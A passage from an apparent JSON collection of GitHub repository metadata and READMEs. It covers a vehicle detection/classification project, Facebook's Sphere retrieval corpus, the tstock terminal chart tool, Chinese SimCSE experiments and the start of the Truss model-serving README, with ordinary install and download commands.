\n\u6b64\u6a21\u5757\u662f\u8f66\u8f86\u68c0\u6d4b\u548c\u8f66\u8f86\u591a\u6807\u7b7e\u8bc6\u522b\u63a5\u53e3\u7684\u5c01\u88c5\uff0c\u9700\u8981\u6307\u5b9a\u6d4b\u8bd5\u6e90\u76ee\u5f55\u548c\u7ed3\u679c\u8f93\u51fa\u76ee\u5f55\u3002\u4e3b\u7c7bCar_DC, \u51fd\u6570__init__\u4e3b\u8981\u8d1f\u8d23\u6c7d\u8f66\u68c0\u6d4b\u3001\u6c7d\u8f66\u8bc6\u522b\u4e24\u4e2a\u6a21\u578b\u7684\u521d\u59cb\u5316\u3002\n\u51fd\u6570detect_classify\u8d1f\u8d23\u9010\u5f20\u5bf9\u56fe\u50cf\u8fdb\u884c\u68c0\u6d4b\u548c\u8bc6\u522b\uff1a\u9996\u5148\u5bf9\u8f93\u5165\u56fe\u50cf\u8fdb\u884c\u9884\u5904\u7406\uff0c\u7edf\u4e00\u8f93\u5165\u683c\u5f0f\uff0c\u7136\u540e\uff0c\u8f93\u51fa\u8be5\u56fe\u50cf\u6240\u6709\u7684\u8f66\u7684\u68c0\u6d4b\u6846\u3002\u901a\u8fc7\u51fd\u6570process_predict\u505anms, \u5750\u6807\u7cfb\u8f6c\u6362\uff0c\u5f97\u5230\u6240\u6709\u6700\u7ec8\u7684\u68c0\u6d4b\u6846\u3002\u7136\u540e\uff0c\u7a0b\u5e8f\u8c03\u7528\u51fd\u6570cls_draw_bbox\uff0c\u5728cls_draw_bbox\u4e2d\uff0c\u9010\u4e00\u5904\u7406\u6bcf\u4e2a\u68c0\u6d4b\u6846\u3002\u9996\u5148\uff0c\u53d6\u51fa\u539f\u56fe\u50cf\u68c0\u6d4b\u6846\u533a\u57df\u68c0\u6d4b\u6846\u5bf9\u5e94\u7684\u7684ROI(region of interest)\uff0c \u5c06ROI\u9001\u5165\u8f66\u8f86\u591a\u6807\u7b7e\u5206\u7c7b\u5668\u3002\u5206\u7c7b\u5668\u8c03\u7528B-CNN\u7b97\u6cd5\u5bf9ROI\u4e2d\u7684\u8f66\u8f86\u8fdb\u884c\u591a\u6807\u7b7e\u5c5e\u6027\u5206\u7c7b\u3002\u53c2\u8003[paper link](http://vis-www.cs.umass.edu/bcnn/docs/bcnn_iccv15.pdf)\u3002B-CNN\u4e3b\u8981\u7528\u4e8e\u8bad\u7ec3\u7aef\u5230\u7aef\u7684\u7ec6\u7c92\u5ea6\u5206\u7c7b\u3002\u672c\u7a0b\u5e8f\u5bf9\u8bba\u6587\u4e2d\u7684\u7f51\u7edc\u7ed3\u6784\u505a\u4e86\u4e00\u5b9a\u7684\u9002\u5e94\u6027\u4fee\u6539\uff1a\u4e3a\u4e86\u517c\u987e\u7a0b\u5e8f\u7684\u63a8\u65ad\u901f\u5ea6\u548c\u51c6\u786e\u5ea6\uff0c\u4e0d\u540c\u4e8e\u8bba\u6587\u4e2d\u91c7\u7528\u7684Vgg-16\uff0c\u8fd9\u91cc\u7684B-CNN\u7684\u57fa\u7840\u7f51\u7edc\u91c7\u7528Resnet-18\u3002
\nThis module is responsible for interface encapsulation of vehicle detection and multi-label classification. You need to specify source directory and result directory. The main class is Car_DC. The pretrained models are loaded and initiated in function init(). In function detect_classify, each input image is pre-processed to get uniformed format, then output the raw bounding boxes for further NMS calculation and coordinates tranformation. We do classification and bounding box drawing in function cls_draw_box based on bounding box ROIs. Bilinear CNN is used for fine-grained classification, and we use resnet-18 as backbone insted of vgg-16 for trade-off of accuracy and speed.\n##### \u8017\u65f6\u7edf\u8ba1\u8017\u65f6 Time consuming\n\u8f66\u8f86\u68c0\u6d4b\uff1a \u5355\u5f20\u56fe\u50cf\u63a8\u65ad\u8017\u65f6\uff0c\u5728\u5355\u4e2aGTX 1050TI GPU\u4e0a\u7ea618ms\u3002
\n\u8f66\u8f86\u591a\u6807\u7b7e\u8bc6\u522b\uff1a\u5355\u5f20\u56fe\u50cf\u63a8\u65ad\u8017\u65f6\uff0c\u5728\u5355\u4e2aGTX TITAN GPU\u4e0a\u7ea67ms\uff0c\u5728\u5355\u4e2aGTX 1050TI GPU\u4e0a\u7ea610ms\u3002
\nVehicle detection: sigle image inference cost 18ms on single GTX1050TI.
\nVehicle classification: single image inference cost 10ms on single GTX1050TI.\n\n##### <2>. \u8f66\u8f86\u591a\u6807\u7b7e\u6570\u636e\u6a21\u5757\uff08\u7531\u4e8e\u4fdd\u5bc6\u534f\u8bae\u7b49\u539f\u56e0\u6682\u65f6\u4e0d\u80fd\u516c\u5f00\u6570\u636e\u96c6\uff09 dataset.py
\n\u8bad\u7ec3\u3001\u6d4b\u8bd5\u6570\u636e\u7c7b\u522b\u6309\u7167\u5b50\u76ee\u5f55\u5b58\u653e\uff0c\u5b50\u76ee\u5f55\u540d\u5373label\uff0cColor_Direction_type\uff0c\u5982Yellow_Rear_suv\u3002
\nVehicle\u7c7b\u91cd\u8f7d\u4e86data.Dataset\u7684init, getitem, len\u65b9\u6cd5\uff1a
\n\u51fd\u6570__init__\u8d1f\u8d23\u521d\u59cb\u5316\u6570\u636e\u8def\u5f84\uff0c\u6570\u636e\u6807\u7b7e\uff0c\u7531\u4e8e\u6570\u636e\u6807\u7b7e\u662f\u591a\u6807\u7b7e\u7c7b\u578b\uff0c\u6545\u5bf9\u8f93\u51fa\u5411\u91cf\u5206\u6bb5\u8ba1\u7b97\u4ea4\u53c9\u71b5loss\u5373\u53ef\u3002
\n\u51fd\u6570__getitem__\u8d1f\u8d23\u8fed\u4ee3\u8fd4\u56de\u6570\u636e\u548c\u6807\u7b7e\uff0c\u8fd4\u56de\u7684\u6570\u636e\u9700\u8981\u7ecf\u8fc7\u6807\u51c6\u5316\u7b49\u9884\u5904\u7406\uff1b\u51fd\u6570__len__\u83b7\u53d6\u6570\u636e\u7684\u603b\u6570\u91cf\u3002\n\n##### <3>. \u8f66\u8f86\u591a\u6807\u7b7e\u8bad\u7ec3\u3001\u6d4b\u8bd5\u6a21\u5757 train_vehicle_multilabel.py\n\u6b64\u6a21\u5757\u8d1f\u8d23\u8f66\u8f86\u591a\u6807\u7b7e\u7684\u8bad\u7ec3\u548c\u6d4b\u8bd5\u3002\u8bad\u7ec3\u8fc7\u7a0b\u9009\u62e9\u4ea4\u53c9\u71b5\u4f5c\u4e3a\u635f\u5931\u51fd\u6570\uff0c\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u7531\u4e8e\u662f\u591a\u6807\u7b7e\u5206\u7c7b\uff0c\u6545\u8ba1\u7b97loss\u7684\u65f6\u5019\u9700\u8981\u7d2f\u52a0\u5404\u4e2a\u6807\u7b7e\u7684loss\uff0c\u5176\u4e2dloss = loss_color + loss_direction + 2.0 * loss_type\uff0c\u6839\u636e\u7ecf\u9a8c\uff0c\u5c06\u8f66\u8f86\u7c7b\u578b\u7684loss\u6743\u91cd\u653e\u5230\u52302\u500d\u6548\u679c\u8f83\u597d\u3002\n
\n\u53e6\u4e00\u65b9\u9762\uff0c\u8bad\u7ec3\u5206\u4e3a\u4e24\u6b65\uff1a\uff081\uff09. \u51bb\u7ed3\u9664\u4e86Resnet-18\u9664\u5168\u8fde\u63a5\u5c42\u4e4b\u5916\u7684\u6240\u6709\u5c42\uff0cFine-tune\u8bad\u7ec3\u5230\u6536\u655b\u4e3a\u6b62\uff1b\uff082\uff09.\u6253\u5f00\u7b2c\u4e00\u6b65\u4e2d\u51bb\u7ed3\u7684\u6240\u6709\u5c42\uff0c\u8fdb\u4e00\u6b65Fine-tune\u8bad\u7ec3\uff0c\u8c03\u6574\u6240\u6709\u5c42\u7684\u6743\u91cd\uff0c\u76f4\u81f3\u6574\u4e2a\u6a21\u578b\u6536\u655b\u4e3a\u6b62\u3002\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "facebookresearch/Sphere", "link": "https://github.com/facebookresearch/Sphere", "tags": [], "stars": 511, "description": "Web-scale retrieval for knowledge-intensive NLP", "lang": "Python", "repo_lang": "", "readme": "# Sphere\n\n\n# About\nIn our paper [*The Web Is Your Oyster - Knowledge-Intensive NLP against a Very Large Web Corpus*](https://arxiv.org/abs/2112.09924) we propose to use a web corpus as a universal, uncurated and unstructured knowledge source for multiple KI-NLP tasks at once. \n\nWe leverage an open web corpus coupled with strong retrieval baselines instead of a black-box, commercial search engine - an approach which facilitates transparent and reproducible research and opens up a path for future studies comparing search engines optimised for humans with retrieval solutions designed for neural networks.\nWe use a subset of [CCNet](https://github.com/facebookresearch/cc_net) covering 134M documents split into 906M passages as the web corpus which we call **Sphere**.\n\nIn this repository we open source indices of Sphere both for the sparse retrieval baseline, compatible with [Pyserini](https://github.com/castorini/pyserini), and our best dense model compatible with [distributed-faiss](https://github.com/facebookresearch/distributed-faiss). We also provide instructions on how to evaluate the retrieval performance for both standard and newly introduced retrieval metrics, using the [KILT](https://github.com/facebookresearch/KILT) API.\n\n\n## Reference\nIf you use the content of this repository in your research, please cite the following:\n```\n@article{DBLP:journals/corr/abs-2112-09924,\n author = {Aleksandra Piktus and Fabio Petroni\n and Vladimir Karpukhin and Dmytro Okhonko\n and Samuel Broscheit and Gautier Izacard\n and Patrick Lewis and Barlas Oguz\n and Edouard Grave and Wen{-}tau Yih\n and Sebastian Riedel},\n title = {The Web Is Your Oyster - Knowledge-Intensive {NLP} against a Very\n Large Web Corpus},\n journal = {CoRR},\n volume = {abs/2112.09924},\n year = {2021},\n url = {https://arxiv.org/abs/2112.09924},\n eprinttype = {arXiv},\n eprint = {2112.09924},\n timestamp = {Tue, 04 Jan 2022 15:59:27 +0100},\n biburl = {https://dblp.org/rec/journals/corr/abs-2112-09924.bib},\n bibsource = {dblp computer science bibliography, https://dblp.org}\n}\n```\n\n## Installation\n```\ngit clone git@github.com:facebookresearch/Sphere.git\ncd Sphere\nconda create -n sphere -y python=3.7 && conda activate sphere\npip install -e .\n```\n\n## Index download\nWe open source pre-built Sphere indices:\n- a Pyserini-compatible sparse BM25 index: [sphere_sparse_index.tar.gz](https://dl.fbaipublicfiles.com/sphere/sphere_sparse_index.tar.gz) - 775.6 GiB\n- a distributed-faiss-compatible dense DPR index: [sphere_sparse_index.tar.gz](https://dl.fbaipublicfiles.com/sphere/sphere_dense_index.tar.gz) - 1.2 TiB\n\nYou can download and unpack respective index files directly e.g. via the browser of `wget`:\n```\nmkdir -p faiss_index\n\nwget -P faiss_index https://dl.fbaipublicfiles.com/sphere/sphere_sparse_index.tar.gz\ntar -xzvf faiss_index/sphere_sparse_index.tar.gz -C faiss_index\n\nwget -P faiss_index https://dl.fbaipublicfiles.com/sphere/sphere_dense_index.tar.gz\ntar -xzvf faiss_index/sphere_dense_index.tar.gz -C faiss_index\n```\n\n# Evaluation with [KILT](https://github.com/facebookresearch/KILT)\nWe implement the retrieval metrics introduced in the paper:\n- the `answer-in-context@k`,\n- the `answer+entity-in-context@k`,\n- as well as the `entity-in-input` ablation metric\n\nwithin the KILT repository. Follow instruction below to perform and evaluate retrieval on KILT tasks for both sparse and dense Sphere indices.\n\n## KILT dependencies\n```bash\npip install -e git+https://github.com/facebookresearch/KILT#egg=KILT\n```\n\nDownload KILT data. Check out instructions in the [KILT](https://github.com/facebookresearch/KILT#download-the-data) repo for more details.\n```bash\nmkdir -p data\npython src/kilt/scripts/download_all_kilt_data.py\npython src/kilt/scripts/get_triviaqa_input.py\n```\n\n## Dense index\n### Install dependencies\n```bash\npip install -e git+https://github.com/facebookresearch/distributed-faiss#egg=distributed-faiss\npip install -e git+https://github.com/facebookresearch/DPR@multi_task_training#egg=DPR\npip install spacy==2.1.8\npython -m spacy download en\n```\n\n### Launch `distributed-faiss` server\nMore details [here](https://github.com/facebookresearch/distributed-faiss#launching-servers-with-submitit-on-slurm-managed-clusters).\n```bash\npython src/distributed-faiss/scripts/server_launcher.py \\\n --log-dir logs \\\n --discovery-config faiss_index/disovery_config.txt \\\n --num-servers 32 \\\n --num-servers-per-node 4 \\\n --timeout-min 4320 \\\n --save-dir faiss_index/ \\\n --mem-gb 500 \\\n --base-port 13034 \\\n --partition dev &\n```\n### Download assets\n- The DPR_web model: [dpr_web_biencoder.cp](http://dl.fbaipublicfiles.com/sphere/dpr_web_biencoder.cp)\n- The configuration file: [dpr_web_sphere.yaml](https://dl.fbaipublicfiles.com/sphere/dpr_web_sphere.yaml)\n```bash\nmkdir -p checkpoints\nwget -P checkpoints http://dl.fbaipublicfiles.com/sphere/dpr_web_biencoder.cp\n\nmkdir -p configs\nwget -P configs https://dl.fbaipublicfiles.com/sphere/dpr_web_sphere.yaml\n```\n\nSubsequently update the following fields in the `dpr_web_sphere.yaml` configuration file:\n```bash\nn_docs: 100 # the number of documents to retrieve per query\nmodel_file: checkpoints/dpr_web_biencoder.cp # path to the downloaded model file\nrpc_retriever_cfg_file: faiss_index/disovery_config.txt # path to the discovery config file used when launching the distributed-faiss server\nrpc_index_id: dense # the name of the folder contaning dense index partitions\n```\n\n### Execute retrieval\nIn order to perform retrieval from the dense index you first need to launch the distributed-faiss server as described above. You can control the KILT datasets you perform retrieval for by modifying respective config files, e.g. `src/kilt/configs/dev_data.json`.\n```bash\npython src/kilt/scripts/execute_retrieval.py \\\n --model_name dpr_distr \\\n --model_configuration configs/dpr_web_sphere.yaml \\\n --test_config src/kilt/kilt/configs/dev_data.json \\\n --output_folder output/dense/\n```\n## Sparse index\n### Install dependencies\nOur sparse index relies on Pyserini, and therfore requires [an install of Java 11](https://github.com/castorini/pyserini#installation) to be available on the machine.\n```bash\npip install jnius\npip install pyserini==0.9.4.0\n```\n\n Next, download the following file:\n- The configuration file: [bm25_sphere.json](https://dl.fbaipublicfiles.com/sphere/bm25_sphere.json)\n```bash\nmkdir -p configs\nwget -P configs https://dl.fbaipublicfiles.com/sphere/bm25_sphere.json\n```\n\nSubsequently update the following field in the `bm25_sphere.json` configuration file:\n```bash\n\"k\": 100, # the number of documents to retrieve per query\n\"index\": \"faiss_index/sparse\", # path to the unpacked sparse BM25 index\n```\n\n### Execute retrieval\n```\npython src/kilt/scripts/execute_retrieval.py \\\n --model_name bm25 \\\n --model_configuration configs/bm25_sphere.json \\\n --test_config src/kilt/kilt/configs/dev_data.json \\\n --output_folder output/sparse/\n```\n\n## Retrieval evaluation\n```bash\npython src/kilt/kilt/eval_retrieval.py \\\n output/$index/$dataset-dev-kilt.jsonl \\ # retrieval results - the output of running eval_retrieval.py\n data/$dataset-dev-kilt.jsonl \\ # gold KILT file (available for download in the KILT repo)\n --ks=\"1,20,100\"\n```\n\n\n# Standalone dense index usage\nInstall and launch `distributed-faiss`. More details on the `distributed-faiss` server [here](https://github.com/facebookresearch/distributed-faiss#launching-servers-with-submitit-on-slurm-managed-clusters).\n\n```bash\npip install -e git+https://github.com/facebookresearch/distributed-faiss#egg=distributed-faiss\n```\n\n```bash\npython src/distributed-faiss/scripts/server_launcher.py \\\n --log-dir logs/ \\\n --discovery-config faiss_index/disovery_config.txt \\\n --num-servers 32 \\\n --num-servers-per-node 4 \\\n --timeout-min 4320 \\\n --save-dir faiss_index/ \\\n --mem-gb 500 \\\n --base-port 13034 \\\n --partition dev &\n```\n\n## Standalone client example\nFor a minimal working example of querying the Sphere dense index, we propose to interact with the DPR model via `transformers` API. To that end please install dependencies:\n```bash\npip install transformers==4.17.0\n```\nUsing the DPR checkpoing with transformers API requires reformatting the original checkpoint. You can download and unpack the `transformers`-complatible DPR_web query encoder here:\n- [dpr_web_query_encoder_hf.tar.gz](https://dl.fbaipublicfiles.com/sphere/dpr_web_query_encoder_hf.tar.gz)\n\n```bash\nmkdir -p checkpoints\nwget -P checkpoints https://dl.fbaipublicfiles.com/sphere/dpr_web_query_encoder_hf.tar.gz\ntar -xzvf checkpoints/dpr_web_query_encoder_hf.tar.gz -C checkpoints/\n```\nAlternatively, you can convert the [`dpr_web_biencoder.cp`](http://dl.fbaipublicfiles.com/sphere/dpr_web_biencoder.cp) model yourself using [available scripts](https://github.com/huggingface/transformers/blob/main/src/transformers/models/dpr/convert_dpr_original_checkpoint_to_pytorch.py).\n\n\nThen you can run the interactive demo:\n```bash\npython scripts/sphere_client_demo_hf.py \\\n --encoder checkpoints/dpr_web_query_encoder_hf \\\n --discovery-config faiss_index/disovery_config.txt \\\n --index-id dense\n```\n\n# License\n`Sphere` is released under the CC-BY-NC 4.0 license. See the `LICENSE` file for details.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Gbox4/tstock", "link": "https://github.com/Gbox4/tstock", "tags": ["python", "trading", "stock-market", "crypto", "stocks", "stock-chart"], "stars": 511, "description": "\ud83d\udcc8A command line tool to view stock charts in the terminal.", "lang": "Python", "repo_lang": "", "readme": "# tstock - Generate stock charts in the terminal! \ud83d\ude80\ud83d\ude80\ud83d\ude80\n\n[![Downloads](https://pepy.tech/badge/tstock)](https://pepy.tech/project/tstock)\n![GitHub code size in bytes](https://img.shields.io/github/languages/code-size/Gbox4/tstock?label=size)\n![PyPI](https://img.shields.io/pypi/v/tstock)\n\n\ud83d\udcc8 tstock is a tool to easily generate stock charts from the command line.\n\nJust type `tstock aapl` to get a 3 month candlestick chart of $AAPL in your terminal!\n\n

\n \"tstock-demo\"\n

\n\n# Features\n- Stocks for most global exchanges\n- Support for major cryptocurrencies\n- Forex markets and currency exchange rates\n- Different time intervals, including intraday trading\n- \"Wisdom\"?!\n\n# Dependencies\n\n- Python 3.6 or greater\n- Docker, if using the Docker version\n\n# Installation\n\n### PyPI\n\n`tstock` is available as a Python 3 package. You can install it using `pip`:\n\n```bash\npip install tstock # use pip3 on Ubuntu 18.04 and older\n```\n\n### AUR\n\n`tstock` is also available on the AUR. If you are on an Archlinux based system, you can just install it using your favorite AUR helper. Example using `yay`:\n\n```bash\nyay -S tstock\n```\n\n### Docker\n\n1. Build Docker: `docker build -t tstock .`\n2. Run: `docker run -e ALPHAVANTAGE_API_KEY= -it tstock:latest tstock aapl`\n\n# Getting started\n\n### AlphaVantage API setup\n\nAfter installing `tstock`, you will need a AlphaVantage API key to pull the market data.\n\n- Make a free AlphaVantage API account at https://www.alphavantage.co/support/#api-key\n- After creating the account, you will see your free API key\n- Run `export ALPHAVANTAGE_API_KEY=`. You can make this permanent by adding this line to your `.bashrc`\n\nNOTE: If you are on Windows, you can set your environment variable by running `$env:ALPHAVANTAGE_API_KEY=\"\"`. You can make this permanent by adding this line to `Microsoft.PowerShell_profile.ps1`\n\n### Usage\n\n```\n$ tstock --help\nusage: tstock [-h] [-t INTERVAL] [-b COUNT] [-w] [-s] [--chart] [-c CURRENCY] [-y LINES] [-a CLASS]\n [--padx COLUMNS] [--pady LINES] [--short] [--nocolor] [-v] [--version]\n [TICKER]\n\ntstock - generate stock charts in the terminal.\n\npositional arguments:\n TICKER Which ticker's data to pull.\n\noptions:\n -h, --help show this help message and exit\n -t INTERVAL Time interval of each candlestick. Valid values are '1min', '5min', '15min', '30min', '60min', 'day', 'week', or 'month'. Defaults to 'day'.\n -b COUNT Number of time intervals back to go back. The number of candlesticks generated. Defaults to fill the terminal.\n -w Enables extra words of 'wisdom'.\n -s Search for stock tickers. Useful for getting exchange codes.\n --chart Print the chart only. Overrides -w.\n -c CURRENCY Set the currency. Only works with '-a crypto'. Defaults to 'USD'.\n -y LINES Height of the chart. Defaults to fill the terminal.\n -a CLASS The asset class of TICKER. Valid values are 'stock', 'crypto', and 'forex'. Autodetects depending on input ticker.\n --padx COLUMNS Horizontal padding of the chart. Defaults to 5.\n --pady LINES Vertical padding of the chart. Defaults to 4.\n --short Short output, prints the last price only.\n --nocolor Prints chart with no color.\n --upcolor COLOR Color of positive candlesticks. Valid values are 'green', 'red', or 'blue'. Defaults to green.\n --downcolor COLOR Color of negative candlesticks. Valid values are 'green', 'red', or 'blue'. Defaults to red.\n -v Toggle verbosity.\n --version Print tstock version.\n\nExamples:\n tstock aapl # chart of $AAPL\n tstock aapl -b 24 -t 60min # the past 24 60-minute-intervals of $AAPL, 20 lines high\n tstock -s shopify # search the API for keyword \"shopify\"\n tstock shop.trt # chart of $SHOP on the TRT exchange\n tstock btc -c GBP -w # chart of the price of Bitcoin in GBP with rockets\n tstock usd/eur # chart of the price of USD in euros\n```\n\nRun `tstock TICKER` to get the a chart of `$TICKER`. Use `-b COUNT` to specify the number of intervals back you want to pull. `-t INTERVAL` will specify the time interval of each candlestick. Use `-y LINES` to specify the length of the chart's y axis.\n\nUse the search function `tstock -s KEYWORD` to search the AlphaVantage API for tickers.\n\nYou can get international markets by specifying a code after `.`. For example, to get SAIC Motor Corporation on the Shanghai Stock Exchange, run `tstock 600104.SHH`. The `-s` option is useful for finding the exchange codes for foreign exchanges. For example:\n\n```\ntstock tesco -s\nThe search returned the following results:\nTSCO.LON (Tesco PLC)\n Reigon: United Kingdom\n Type: Equity\n Currency: GBX\n```\n\nNow we know the ticker, we can get fetch the chart with `tstock tsco.lon`.\n\nFor more options, run `tstock -h`\n\nMore API information in AlphaVantage's docs: https://www.alphavantage.co/documentation\n\n\n# Notes\n\n- The free tier of the API is limited to 500 API calls per day, 5 calls per minute.\n- If you are using Windows, the ANSI escape codes will not display properly in the default cmd shell or PowerShell. Please use a terminal emulator that supports ANSI escape codes such as Windows Terminal.\n\n# Donate\n\nI develop `tstock` for free in my spare time. If you like it, and want to buy me a coffee, I'd really appreciate it.\n\nDonate: https://www.buymeacoffee.com/Gbox4\n\nBitcoin: (QR) `bc1qusuztegpfuh7jk25l2dx5xyjvasgryrqg42d5n`\n\nBCH: (QR) `qq0gedhne30lcr3253zz08sy4ryxukgx4gcrk6qzjg`\n\nMonero: (QR) `87wuCKbbchKV8Dz3JRoSN3jaqWBSiEShFXkFrYUaKT8Bew4P7dFvUJWVVR6RLr84J44QCdtNVyR6QC7aCSKYUWfnGK9y4K2`\n\nNano: `nano_15pqkfph8wfk4dbtkcrq88giff6xgqzs3znf44nfe1g8sgaixwaj6pbepsmn`\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bojone/SimCSE", "link": "https://github.com/bojone/SimCSE", "tags": [], "stars": 511, "description": "SimCSE\u5728\u4e2d\u6587\u4efb\u52a1\u4e0a\u7684\u7b80\u5355\u5b9e\u9a8c", "lang": "Python", "repo_lang": "", "readme": "# SimCSE \u4e2d\u6587\u6d4b\u8bd5\n\nSimCSE\u5728\u5e38\u89c1\u4e2d\u6587\u6570\u636e\u96c6\u4e0a\u7684\u6d4b\u8bd5\uff0c\u5305\u542b[ATEC](https://github.com/IceFlameWorm/NLP_Datasets/tree/master/ATEC)\u3001[BQ](http://icrc.hitsz.edu.cn/info/1037/1162.htm)\u3001[LCQMC](http://icrc.hitsz.edu.cn/Article/show/171.html)\u3001[PAWSX](https://arxiv.org/abs/1908.11828)\u3001[STS-B](https://github.com/pluto-junzeng/CNSD)\u51715\u4e2a\u4efb\u52a1\u3002\n\n## \u4ecb\u7ecd\n\n- \u535a\u5ba2\uff1ahttps://kexue.fm/archives/8348\n- \u8bba\u6587\uff1a[\u300aSimCSE: Simple Contrastive Learning of Sentence Embeddings\u300b](https://arxiv.org/abs/2104.08821)\n- \u5b98\u65b9\uff1ahttps://github.com/princeton-nlp/SimCSE\n\n## \u6587\u4ef6\n\n```\n- utils.py \u5de5\u5177\u51fd\u6570\n- eval.py \u8bc4\u6d4b\u4e3b\u6587\u4ef6\n```\n\n## \u8bc4\u6d4b\n\n\u547d\u4ee4\u683c\u5f0f\uff1a\n```\npython eval.py [model_type] [pooling] [task_name] [dropout_rate]\n```\n\n\u4f7f\u7528\u4f8b\u5b50\uff1a\n```\npython eval.py BERT cls ATEC 0.3\n```\n\n\u5176\u4e2d\u56db\u4e2a\u53c2\u6570\u5fc5\u987b\u4f20\u5165\uff0c\u542b\u4e49\u5206\u522b\u5982\u4e0b\uff1a\n```\n- model_type: \u6a21\u578b\uff0c\u5fc5\u987b\u662f['BERT', 'RoBERTa', 'WoBERT', 'RoFormer', 'BERT-large', 'RoBERTa-large', 'SimBERT', 'SimBERT-tiny', 'SimBERT-small']\u4e4b\u4e00\uff1b\n- pooling: \u6c60\u5316\u65b9\u5f0f\uff0c\u5fc5\u987b\u662f['first-last-avg', 'last-avg', 'cls', 'pooler']\u4e4b\u4e00\uff1b\n- task_name: \u8bc4\u6d4b\u6570\u636e\u96c6\uff0c\u5fc5\u987b\u662f['ATEC', 'BQ', 'LCQMC', 'PAWSX', 'STS-B']\u4e4b\u4e00\uff1b\n- dropout_rate: \u6d6e\u70b9\u6570\uff0cdropout\u7684\u6bd4\u4f8b\uff0c\u5982\u679c\u4e3a0\u5219\u4e0ddropout\uff1b\n```\n\n## \u73af\u5883\n\u6d4b\u8bd5\u73af\u5883\uff1atensorflow 1.14 + keras 2.3.1 + bert4keras 0.10.5\uff0c\u5982\u679c\u5728\u5176\u4ed6\u73af\u5883\u7ec4\u5408\u4e0b\u62a5\u9519\uff0c\u8bf7\u6839\u636e\u9519\u8bef\u4fe1\u606f\u81ea\u884c\u8c03\u6574\u4ee3\u7801\u3002\n\n## \u4e0b\u8f7d\n\nGoogle\u5b98\u65b9\u7684\u4e24\u4e2aBERT\u6a21\u578b\uff1a\n- BERT\uff1a[chinese_L-12_H-768_A-12.zip](https://storage.googleapis.com/bert_models/2018_11_03/chinese_L-12_H-768_A-12.zip)\n- RoBERTa\uff1a[chinese_roberta_wwm_ext_L-12_H-768_A-12.zip](https://github.com/ymcui/Chinese-BERT-wwm)\n- NEZHA\uff1a[NEZHA-base-WWM](https://github.com/huawei-noah/Pretrained-Language-Model/tree/master/NEZHA-TensorFlow)\n- WoBERT\uff1a[chinese_wobert_plus_L-12_H-768_A-12.zip](https://github.com/ZhuiyiTechnology/WoBERT)\n- RoFormer\uff1a[chinese_roformer_L-12_H-768_A-12.zip](https://github.com/ZhuiyiTechnology/roformer)\n- SimBERT: [chinese_simbert_L-12_H-768_A-12.zip](https://github.com/ZhuiyiTechnology/simbert)\n- SimBERT-small: [chinese_simbert_L-6_H-384_A-12.zip](https://github.com/ZhuiyiTechnology/simbert)\n- SimBERT-tiny: [chinese_simbert_L-4_H-312_A-12.zip](https://github.com/ZhuiyiTechnology/simbert)\n\n\u5173\u4e8e\u8bed\u4e49\u76f8\u4f3c\u5ea6\u6570\u636e\u96c6\uff0c\u53ef\u4ee5\u4ece\u6570\u636e\u96c6\u5bf9\u5e94\u7684\u94fe\u63a5\u81ea\u884c\u4e0b\u8f7d\uff0c\u4e5f\u53ef\u4ee5\u4ece\u4f5c\u8005\u63d0\u4f9b\u7684\u767e\u5ea6\u4e91\u94fe\u63a5\u4e0b\u8f7d\u3002\n- \u94fe\u63a5: https://pan.baidu.com/s/1d6jSiU1wHQAEMWJi7JJWCQ \u63d0\u53d6\u7801: qkt6\n\n\u5176\u4e2dsenteval_cn\u76ee\u5f55\u662f\u8bc4\u6d4b\u6570\u636e\u96c6\u6c47\u603b\uff0csenteval_cn.zip\u662fsenteval\u76ee\u5f55\u7684\u6253\u5305\uff0c\u4e24\u8005\u4e0b\u5176\u4e00\u5c31\u597d\u3002\n\n## \u76f8\u5173\n- BERT-whitening\uff1ahttps://github.com/bojone/BERT-whitening\n\n## \u4ea4\u6d41\n\nQQ\u4ea4\u6d41\u7fa4\uff1a808623966\uff0c\u5fae\u4fe1\u7fa4\u8bf7\u52a0\u673a\u5668\u4eba\u5fae\u4fe1\u53f7spaces_ac_cn\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "basetenlabs/truss", "link": "https://github.com/basetenlabs/truss", "tags": ["data-science", "machine-learning", "python"], "stars": 511, "description": "Serve any model without boilerplate code", "lang": "Python", "repo_lang": "", "readme": "# Truss\n\n**Serve any model without boilerplate code**\n\n![Truss logo](https://raw.githubusercontent.com/basetenlabs/truss/main/docs/assets/truss_logo_horizontal.png)\n\n[![PyPI version](https://badge.fury.io/py/truss.svg)](https://badge.fury.io/py/truss)\n[![ci_status](https://github.com/basetenlabs/truss/actions/workflows/main.yml/badge.svg)](https://github.com/basetenlabs/truss/actions/workflows/main.yml)\n\nMeet Truss, a seamless bridge from model development to model delivery. Truss presents an open-source standard for packaging models built in any framework for sharing and deployment in any environment, local or production.\n\nGet started with the [end-to-end tutorial](https://truss.baseten.co/e2e).\n\n## What can I do with Truss?\n\nIf you've ever tried to get a model out of a Jupyter notebook, Truss is for you.\n\nTruss exposes just the right amount of complexity around things like Docker and APIs without you really having to think about them. Here are some of the things Truss does:\n\n* \ud83c\udfce Turns your Python model into a microservice with a production-ready API endpoint, no need for Flask or Django.\n* \ud83c\udf9a For most popular frameworks, includes automatic model serialization and deserialization.\n* \ud83d\udecd Freezes dependencies via Docker to make your training environment portable.\n* \ud83d\udd70 Enables rapid iteration with local development that matches your production environment.\n* \ud83d\uddc3 Encourages shipping parsing and even business logic alongside your model with integrated pre- and post-processing functions.\n* \ud83e\udd16 Supports running predictions on GPUs. (Currently limited to certain hardware, more coming soon)\n* \ud83d\ude49 Bundles secret management to securely give your model access to API keys.\n\n## Installation\n\nTruss requires Python >=3.7, <3.11\n\nTo install from [PyPi](https://pypi.org/project/truss/), run:\n\n```\npip install truss\n```\n\nTo download the source code directly (for development), clone this repository and follow the setup commands in our [contributors' guide](CONTRIBUTING.md).\n\nTruss is actively developed, and we recommend using the latest version. To update your Truss installation, run:\n\n```\npip install --upgrade truss\n```\n\nThough Truss is in beta, we do care about backward compatibility. Review the [release notes](docs/CHANGELOG.md) before upgrading, and note that we follow semantic versioning, so any breaking changes require the release of a new major version.\n\n## How to use Truss\n\nGenerate and serve predictions from a Truss with [this 